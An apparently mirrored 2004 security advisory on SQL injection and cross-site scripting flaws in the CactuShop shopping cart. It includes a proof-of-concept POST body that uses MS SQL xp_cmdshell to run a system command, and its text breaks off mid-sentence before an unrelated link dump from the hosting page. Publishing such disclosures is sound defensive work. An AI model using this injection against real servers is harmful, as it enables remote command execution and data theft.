JSEMTS搜尋引擎
 

From: "S-Quadra Security Research"
To: "bugtraq" ; "full-disclosure"
Subject: CactuSoft CactuShop v5.x shopping cart software multiple security vulnerabilities
Date: Wednesday, March 31, 2004 9:54 PM

S-Quadra Advisory #2004-03-31

Topic: CactuSoft CactuShop v5.x shopping cart software multiple security
vulnerabilities
Severity: High
Vendor URL: http://www.cactushop.com
Advisory URL: http://www.s-quadra.com/advisories/Adv-20040331.txt
Release date: 31 Mar 2004

1. DESCRIPTION

CactuShop is an ASP application for running an e-commerce web site. It
incorporates a databased catalogue system, front end pages for product
navigation, back end pages for updating product details and robust
basket code for memorizing product selections as a visitor moves around
the web site. ASP software is designed to run on a Microsoft NT or Win
2000 server and to use MS Access, MS SQL Server or MySQL as a backend.
Please visit http://www.cactushop.com for information about CactuShop
shopping cart.

2. DETAILS

-- Vulnerability 1: SQL Injection vulnerability

An SQL Injection vulnerability has been found in following scripts :
'mailorder.asp' and 'payonline.asp'. User supplied input parameter is
'strItems' not filtered before being used in an SQL query. Thus the
query modification through malformed input is possible.

Successful exploitation of this vulnerability can enable an attacker
to execute commands in the system (via MS SQL xp_cmdshell function).

-- Vulnerability 2: Cross Site Scripting vulnerability found in
'largeimage.asp'script

By injecting specially crafted javascript code in url and tricking a
user to visit it a remote attacker can steal user session id and gain
access to user's personal data.

--PoC code

--Vulnerability 1:

Platform: MS SQL Server as a backend

Posting this data to 'payonline.asp' executes 'dir c:' command

strAgain=yes&CD_EmailAddress=dummy@someemailservice.com&CD_Password=&
CD_AffiliateID=&CD_CardholderCountry=200&CD_ShippingCountry=200&
CD_ShippingPostcode=&strPaymentSystem=email&CP_CouponCode=&numLanguageID=1&
numCurrencyID=1&numItemCount=2&strItems=214;+exec+master..xp_cmdshell+'dir+c:'--z165z&
strQuantities=6z2z&numShipMethod=1&btnProceed=Proceed

-- Vulnerability 2:

http://[target]/popuplargeimage.asp?strImageTag=

3. FIX INFORMATION

11 Mar 2004: S-Quadra alerted CactuSoft (CactuShop developers) on these
issues.
15 Mar 2004: CactuSoft response:

"1) SQL Injection

On payonline.asp and all mailorder pages the strItems field is now
parsed for single-quote (') characters before being used with database
queries. Single quotes are escaped (replaced with 2 single-quotes) to
ensure SQL Injection won't work.

2) Javascript Injection

The strImageTag field is parse for HTML tags characters (< and >) and
are removed from the string. This should ensure against






搜尋引擎讓我們程式搜尋結果更加完美
  • 如果您覺得該文件有幫助到您,煩請按下我
  • 如果您覺得該文件是一個一無是處的文件,也煩請按下我

  • 搜尋引擎該文件您看起來是亂碼嗎?您可以切換編碼方式試試看!ISO-8859-1 | latin1 | euc-kr | euc-jp | CP936 | CP950 | UTF-8 | GB2312 | BIG5 |
    搜尋引擎本文件可能涉及色情、暴力,按我申請移除該文件

    搜尋引擎網址長?按我產生分享用短址

    ©2026 JSEMTS

    https://tw.search.yahoo.com/search;_ylt=A8tUwYgkQU1YcXoAUE9r1gt.;_ylc=X1MDMjExNDcwNTAwMwRfcgMyBGZyA3lmcC10LTkwMC10dwRncHJpZAMxWU5tY2FYMVFGQ2ZvUXZGN1N0bzVBBG5fcnNsdAMwBG5fc3VnZwMwBG9yaWdpbgN0dy5zZWFyY2gueWFob28uY29tBHBvcwMwBHBxc3RyAwRwcXN0cmwDBHFzdHJsAzQ4BHF1ZXJ5AyVFNiVBRCVBMSVFNiVBRCU4QyUyMCVFNSVCMCU4OCVFNiU4MyU4NSVFNSU5QyU5OAR0X3N0bXADMTQ4MTQ1Nzk3Ng--?p=%E6%AD%A1%E6%AD%8C+%E5%B0%88%E6%83%85%E5%9C%98&fr2=sb-top-tw.search&fr=yfp-t-900-tw&rrjfid=2443847 https://tw.search.yahoo.com/search;_ylt=A8tUwYgkQU1YcXoAUE9r1gt.;_ylc=X1MDMjExNDcwNTAwMwRfcgMyBGZyA3lmcC10LTkwMC10dwRncHJpZAMxWU5tY2FYMVFGQ2ZvUXZGN1N0bzVBBG5fcnNsdAMwBG5fc3VnZwMwBG9yaWdpbgN0dy5zZWFyY2gueWFob28uY29tBHBvcwMwBHBxc3RyAwRwcXN0cmwDBHFzdHJsAzQ4BHF1ZXJ5AyVFNiVBRCVBMSVFNiVBRCU4QyUyMCVFNSVCMCU4OCVFNiU4MyU4NSVFNSU5QyU5OAR0X3N0bXADMTQ4MTQ1Nzk3Ng--?p=%E6%AD%A1%E6%AD%8C+%E5%B0%88%E6%83%85%E5%9C%98&fr2=sb-top-tw.search&fr=yfp-t-900-tw&rrjfid=9403483 https://tw.search.yahoo.com/search;_ylt=A8tUwZJ2QE1YaVcAUmFr1gt.;_ylc=X1MDMjExNDcwNTAwMwRfcgMyBGZyA3lmcC10LTkwMC1zLXR3BGdwcmlkAwRuX3JzbHQDMARuX3N1Z2cDMARvcmlnaW4DdHcuc2VhcmNoLnlhaG9vLmNvbQRwb3MDMARwcXN0cgMEcHFzdHJsAwRxc3RybAM4NARxdWVyeQMlRTglQjYlODUlRTUlOEYlQUYlRTYlODQlOUIlRTclOUElODQlRTUlQUYlQjYlRTUlQUYlQjYlMjAlRTglODMlQTElRTUlQUUlODklRTUlQTglOUMEdF9zdG1wAzE0ODE0NTc3OTM-?p=%E8%B6%85%E5%8F%AF%E6%84%9B%E7%9A%84%E5%AF%B6%E5%AF%B6+%E8%83%A1%E5%AE%89%E5%A8%9C&fr2=sb-top-tw.search&fr=yfp-t-900-s-tw&rrjfid=4071451 https://tw.search.yahoo.com/search;_ylt=A8tUwYgkQU1YcXoAUE9r1gt.;_ylc=X1MDMjExNDcwNTAwMwRfcgMyBGZyA3lmcC10LTkwMC10dwRncHJpZAMxWU5tY2FYMVFGQ2ZvUXZGN1N0bzVBBG5fcnNsdAMwBG5fc3VnZwMwBG9yaWdpbgN0dy5zZWFyY2gueWFob28uY29tBHBvcwMwBHBxc3RyAwRwcXN0cmwDBHFzdHJsAzQ4BHF1ZXJ5AyVFNiVBRCVBMSVFNiVBRCU4QyUyMCVFNSVCMCU4OCVFNiU4MyU4NSVFNSU5QyU5OAR0X3N0bXADMTQ4MTQ1Nzk3Ng--?p=%E6%AD%A1%E6%AD%8C+%E5%B0%88%E6%83%85%E5%9C%98&fr2=sb-top-tw.search&fr=yfp-t-900-tw&rrjfid=2003309 https://tw.search.yahoo.com/search;_ylt=A8tUwYgkQU1YcXoAUE9r1gt.;_ylc=X1MDMjExNDcwNTAwMwRfcgMyBGZyA3lmcC10LTkwMC10dwRncHJpZAMxWU5tY2FYMVFGQ2ZvUXZGN1N0bzVBBG5fcnNsdAMwBG5fc3VnZwMwBG9yaWdpbgN0dy5zZWFyY2gueWFob28uY29tBHBvcwMwBHBxc3RyAwRwcXN0cmwDBHFzdHJsAzQ4BHF1ZXJ5AyVFNiVBRCVBMSVFNiVBRCU4QyUyMCVFNSVCMCU4OCVFNiU4MyU4NSVFNSU5QyU5OAR0X3N0bXADMTQ4MTQ1Nzk3Ng--?p=%E6%AD%A1%E6%AD%8C+%E5%B0%88%E6%83%85%E5%9C%98&fr2=sb-top-tw.search&fr=yfp-t-900-tw&rrjfid=9865722 https://tw.search.yahoo.com/search;_ylt=A8tUwZJ2QE1YaVcAUmFr1gt.;_ylc=X1MDMjExNDcwNTAwMwRfcgMyBGZyA3lmcC10LTkwMC1zLXR3BGdwcmlkAwRuX3JzbHQDMARuX3N1Z2cDMARvcmlnaW4DdHcuc2VhcmNoLnlhaG9vLmNvbQRwb3MDMARwcXN0cgMEcHFzdHJsAwRxc3RybAM4NARxdWVyeQMlRTglQjYlODUlRTUlOEYlQUYlRTYlODQlOUIlRTclOUElODQlRTUlQUYlQjYlRTUlQUYlQjYlMjAlRTglODMlQTElRTUlQUUlODklRTUlQTglOUMEdF9zdG1wAzE0ODE0NTc3OTM-?p=%E8%B6%85%E5%8F%AF%E6%84%9B%E7%9A%84%E5%AF%B6%E5%AF%B6+%E8%83%A1%E5%AE%89%E5%A8%9C&fr2=sb-top-tw.search&fr=yfp-t-900-s-tw&rrjfid=7658691 [前往][教學] Windows桌面右鍵沒反應一直轉圈(桌面滑鼠右鍵點不出來)[分享] 常用的 SQL 語法Math[分享] 悲傷的五個階段lapromiskin17-richbeauty[教學] 執行檔簽名方式[前往]ivyplateup-wiki-kouryakuCantonese518[前往]cioUlifeStyle[前往]BoxDrive[教學] OFFICE 201X 啟動跳出365啟用畫面eleganthome-decorshiappleolivebeddingLineage45Yspondereasypsmna.gpwbtwitwsDoraforumibm[前往]AsusWebStorage[前往][前往]finfoMediumfamishop.fami[前往]coop.fcuBVW批次網站伺服器BVW批次網站伺服器(BATCH VBSCRIPT WEBSERVER)[分享] 歡迎來到歸檔星球https://www.jplopsoft.idv.tw/neocities/ftvnews[教學] 限制遠端桌面(RDP)只能允許台灣IP連線[前往][前往]taiwanmobile[前往]japan-lkeoraclebuybenirentcarStarsaIdcpfqiaoxiaojun[前往]99kubonownewsbrands[前往]data.tainanSanyatt[前往]Bufferpc590TucaptionsScdmtj0752snyw[機密] 會員名單yam[前往][前往][教學] 好用的遠端連線工具RDCMAN[前往]aiguajiMirobaike[前往]imarketing.iwant-in[前往][前往]kobold-vorwerktaiwanshop[前往][前往]Quyushujucustomsdot-sthttp://kserver3.asuscomm.com/[前往][前往][前往]bastillepostMamaclubsu.ntpupara-daily[分享] 網友分享作品axiangvoicetubeVKAudionet[前往]cbec[前往]XinweiyuKatfilecool-styleMuralsanjing3cHottownshophyphyWphl03shuo[前往][教學] 系統還原出現錯誤0X81000203解決[前往][前往][前往]專情團專情團官方網站M2enlightcorpciecafinetbookletAmeblomoxahttps://coin028.com/ArchiveWorld/home/[前往]jcapothecaryroc-taiwan[前往]jpmedwdasec[前往]Coolalersimsonqamy6622[前往][前往]SlashTW[前往]foodtastic[教學] Win10的Explorer記憶體VRam洩漏問題agefans.la[前往][教學] 台男悲歌2022Jplopsoft[教學] 中華電信Hinet數據機(光世代、小烏龜)登入帳號密碼[前往]BloggerLvzikubeamsbuzzorangeGulavaw[前往][資料] Win圖示庫fintechspace[前往]travel.yamRisucgmhautodeskmengejiufenglsmeishijournal[教學] 萬用和弦(鋼琴)[教學] TCP Port 說明[教學] 顯示卡高階、中階與低階分級量表(2022)[前往]nfumcae.nfupttcDcardseventhingsmiestilojewelrywenk-medianetbridgetech[前往]parklane[前往][前往][前往]IceDrive[前往][資訊] 輪迴之根Lineage66序號搜尋序號搜尋[分享] 錄製網路攝影機畫面、螢幕畫面(PotPlayer)[前往]p-bandaipitoteches-design[前往][前往]bbslineapplealmond[教學] 副檔名M3U8影片下載教學[教學] Rufus取代品VentoysvencremerOnlinebbarlockPhoenixstoneage[前往]frankknow結瑞伺服器結瑞伺服器zdicyu-metalBraveSites[前往]Ky58GotoMaxwikiversity[前往][前往]ApkWebNode[前往]gogoro瑞銓藝術鍛造生產提供藝術鍛造門、鍛造欄杆、鍛造扶手、鍛造防盜窗、鍛造採光罩、鍛造信箱、鍛造門牌、鍛造飾屏、鍛造精品、鍛造門窗。proton.me[前往]portwelllittleradarrollinggreens[前往][前往][前往]Yinyue7dailyview[前往][前往][前往]sglpwWindsorcn[前往][前往]bmw[前往][前往]BrockcaGamehuseNiagarachinese[前往]http://hawl-q9452.softether.net/huawin[前往]transglobeLjl32knewshefeiyechangwhichavrakuyayachungYamol[教學] EXpansion - Message Digest v2(ex_md2)[教學] 安裝VB6在Windows10系統本文搜尋本文搜尋Twstayex_md1ex_md1[前往][前往]lewdreview.spacetimberlandtnfshwiki.tfcis[前往][前往][技術] LibreOffice卡頓問題解決[前往][機密] 2010~2018年至中台情報人員名單專業扶手廠商專業扶手廠商[前往]Yxwst58megabank[前往]dictionnaire.reverso歸檔星球[前往]chengyang-propertyns-health[前往]shonm32wikibusinesspro[前往]fujikong3PpxclubJJVKhmly666tingchousnw999tn[教學] 使用Deadwood封鎖指定軟體服務之研究(以Adobe為例)nestlebowayanalerbolarioPokeunivyongrenqianyou[教學] HTML超連接產生器[前往][技術] 將 Win11 「 右鍵選單 」 變 Win10 版本[前往]video.fridayIT TOP Blog